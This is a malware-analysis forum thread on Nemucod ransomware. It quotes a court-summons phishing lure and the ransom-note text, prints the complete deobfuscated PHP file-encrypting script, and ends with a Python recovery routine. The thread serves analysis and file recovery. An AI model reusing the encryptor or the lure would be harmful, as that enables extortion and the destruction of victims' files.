JS/Nemucod (Zippy ransomeware)

Forum for analysis and discussion about malware.
maddog4012
Posts: 76
Joined: Mon Aug 04, 2014 6:53 pm

JS/Nemucod (Zippy ransomeware)

Post by maddog4012 » Mon Apr 18, 2016 4:35 pm

Came across this over the weekend. The JavaScript came as an attachment with the following e-mail message:

You have to appear in the Court on the April 22.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

You can find the Court Notice is in the attachment.

Regards,
Brad Brock,
Court Secretary.


When executed, it downloads a random file with a .png.exe extension.

Antelox
Posts: 264
Joined: Sun Mar 21, 2010 10:38 pm

Re: Zippy ransomeware

Post by Antelox » Wed Apr 20, 2016 2:40 pm


parviz
Posts: 2
Joined: Sun Mar 17, 2013 6:18 am

Re: Zippy ransomeware

Post by parviz » Mon Apr 25, 2016 5:39 am

maddog4012 wrote: Came across this over the weekend. The JavaScript came as an attachment with the following e-mail message:

You have to appear in the Court on the April 22.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

You can find the Court Notice is in the attachment.

Regards,
Brad Brock,
Court Secretary.


When executed, it downloads a random file with a .png.exe extension.
Can't find the password.

TETYYSs
Posts: 98
Joined: Fri Jun 28, 2013 6:51 pm

Re: Zippy ransomeware

Post by TETYYSs » Mon Apr 25, 2016 11:47 am

parviz wrote: Can't find the password.
Protip: it's on the current page you're viewing.

Antelox
Posts: 264
Joined: Sun Mar 21, 2010 10:38 pm

Re: Zippy ransomeware

Post by Antelox » Fri Apr 29, 2016 1:06 pm

New Nemucod Variant. 7-zip is not used anymore.

https://glot.io/snippets/ee7hiif87k

BR,

Antelox

Intimacygel
Posts: 24
Joined: Wed Jun 05, 2013 3:16 pm

Re: Zippy ransomeware

Post by Intimacygel » Fri Apr 29, 2016 3:28 pm

Antelox wrote:New Nemucod Variant. 7-zip is not used anymore.

https://glot.io/snippets/ee7hiif87k

BR,

Antelox
Where do we download those variants from your link?

Antelox
Posts: 264
Joined: Sun Mar 21, 2010 10:38 pm

Re: Zippy ransomeware

Post by Antelox » Sun May 01, 2016 8:40 pm

In the attachment is the archive which contains the original email's attachment.

I wrote simple python scripts to extract the key and recover the files infected by this last Nemucod variant:

https://github.com/Antelox/NemucodFR

BR,

Antelox

Antelox
Posts: 264
Joined: Sun Mar 21, 2010 10:38 pm

Re: Zippy ransomeware

Post by Antelox » Sun May 22, 2016 1:31 pm

NemucodFR v. 0.2 is out. Now it handles 2 Nemucod variants.

https://github.com/Antelox/NemucodFR

BR,

Antelox

xors
Posts: 163
Joined: Mon May 23, 2016 2:01 am

Nemucod Ransomware

Post by xors » Mon Dec 12, 2016 9:45 pm

Hello all,

The dropper is a .wsf file. It downloads two files, php4ts.dll and a file which will run a PHP file (a.php). It looks like the PHP file is doing the encryption. Some strings:

- If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
- It`s useless to reinstall Windows, update antivirus software, etc.
- Nobody can help you except us.
- You can find this manual on your desktop (DECRYPT.txt).
- Your files can be decrypted only after you make payment.
0.34008019
1. Create Bitcoin wallet here:
2. Buy 0.43335 BTC with cash, using search here:
3. Send 0.43335 BTC to this Bitcoin address:
4. Open one of the following links in your browser to download decryptor:
5. Run decryptor to restore your files.
All your documents, photos, databases and other important personal files
ATTENTION!
PLEASE REMEMBER:
To restore your files you have to pay 0.43335 BTC (bitcoins).
were encrypted using strong RSA-1024 algorithm with a unique key.

@xorsthingsv2

Antelox
Posts: 264
Joined: Sun Mar 21, 2010 10:38 pm

Re: Nemucod Ransomware

Post by Antelox » Tue Dec 13, 2016 7:32 am

xors wrote:Hello all,

The dropper is a .wsf file. It downloads two files, php4ts.dll and a file which will run a PHP file (a.php). It looks like the PHP file is doing the encryption. Some strings:

- If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
- It`s useless to reinstall Windows, update antivirus software, etc.
- Nobody can help you except us.
- You can find this manual on your desktop (DECRYPT.txt).
- Your files can be decrypted only after you make payment.
0.34008019
1. Create Bitcoin wallet here:
2. Buy 0.43335 BTC with cash, using search here:
3. Send 0.43335 BTC to this Bitcoin address:
4. Open one of the following links in your browser to download decryptor:
5. Run decryptor to restore your files.
All your documents, photos, databases and other important personal files
ATTENTION!
PLEASE REMEMBER:
To restore your files you have to pay 0.43335 BTC (bitcoins).
were encrypted using strong RSA-1024 algorithm with a unique key.

It's the last Nemucod ransomware PHP variant, the one which uses RC4 encryption. The deobfuscated script is below:

<?php set_time_limit(0);
ini_set("display_errors", "Off");
// Walk every existing drive letter from C: to Z:
for ($i = 67;$i <= 90;$i++) if (is_dir(chr($i) . ":")) Tree(chr($i) . ":");
function Tree($p) {
    $s = chr(92);                                                  // backslash path separator
    $k = base64_decode("MGCQXIq4mcz/0AQ48CBQIFCAiMD4gLDgueobOnOs"); // hard-coded RC4 key, identical for every victim
    $a = "e";                                                      // "e" = encrypt, "d" = decrypt (.crypted files)
    // Skip system, program and temp directories and the recycle bin so the host keeps running
    if (preg_match("/" . $s . $s . "(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i", $p) || preg_match("/recycle/i", $p)) return;
    $dp = opendir($p);
    if ($dp === false) return;
    while ($o = readdir($dp)) if ($o != "." && $o != "..") {
        if (is_dir($p . $s . $o)) {
            Tree($p . $s . $o);
        } elseif ($a == "e" && preg_match("/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i", $o) || $a == "d" && preg_match("/[.](crypted)$/i", $o)) {
            chmod($p . $s . $o, 0777);
            $fp = fopen($p . $s . $o, "r+");
            if ($fp !== false) {
                // Only the first 2048 bytes of the file are read and overwritten in place
                $b = fread($fp, 2048);
                // RC4 key-scheduling algorithm (KSA)
                $z = array();
                for ($i = 0;$i < 256;$i++) $z[$i] = $i;
                $j = 0;
                for ($i = 0;$i < 256;$i++) {
                    $j = ($j + $z[$i] + ord($k[$i % strlen($k) ])) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                }
                // RC4 PRGA: XOR the header with the keystream
                $i = 0;
                $j = 0;
                $c = "";
                for ($y = 0;$y < strlen($b);$y++) {
                    $i = ($i + 1) % 256;
                    $j = ($j + $z[$i]) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                    $c.= $b[$y] ^ chr($z[($z[$i] + $z[$j]) % 256]);
                }
                fseek($fp, 0);
                fwrite($fp, $c);
                fclose($fp);
                if ($a == "e") {
                    rename($p . $s . $o, $p . $s . $o . ".crypted");
                } else {
                    rename($p . $s . $o, preg_replace("/[.]crypted$/", "", $p . $s . $o));
                }
            }
        }
    }
    closedir($dp);
}
BR,

Antelox
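Because the script above applies RC4 with one hard-coded key to only the first 2048 bytes of each file, recovery just means re-applying the same keystream to the header and dropping the .crypted suffix. The following is an added example of that recovery written for this thread; it is not Antelox's NemucodFR tool, and the file name and sample bytes in the round-trip helper are constructed for the demonstration.

```python
import base64
import os
import tempfile

# Key and header length taken from the deobfuscated Nemucod PHP script above.
NEMUCOD_KEY = base64.b64decode("MGCQXIq4mcz/0AQ48CBQIFCAiMD4gLDgueobOnOs")
HEADER_LEN = 2048  # the script only reads and overwrites the first 2048 bytes
SUFFIX = ".crypted"

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA), mirroring the two loops in the PHP script."""
    s = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:  # keystream generation XORed with the data
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)

def recover_file(path: str, key: bytes = NEMUCOD_KEY) -> str:
    """RC4 is symmetric: re-encrypt the header with the same key, then rename."""
    if not path.endswith(SUFFIX):
        raise ValueError("not a Nemucod-encrypted name: " + path)
    with open(path, "r+b") as fp:
        header = fp.read(HEADER_LEN)
        fp.seek(0)
        fp.write(rc4(key, header))
    restored = path[: -len(SUFFIX)]
    os.rename(path, restored)
    return restored

def simulate_and_recover(sample: bytes) -> bytes:
    """Constructed round trip: damage a sample the way the script does, then recover it."""
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "report.docx")  # constructed file name
        with open(victim, "wb") as fp:
            fp.write(sample)
        with open(victim, "r+b") as fp:  # the script's in-place header encryption
            head = fp.read(HEADER_LEN)
            fp.seek(0)
            fp.write(rc4(NEMUCOD_KEY, head))
        os.rename(victim, victim + SUFFIX)
        with open(recover_file(victim + SUFFIX), "rb") as fp:
            return fp.read()
```

The same approach only works for samples carrying this exact key; a variant with a different embedded key needs that key extracted from its own script first.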
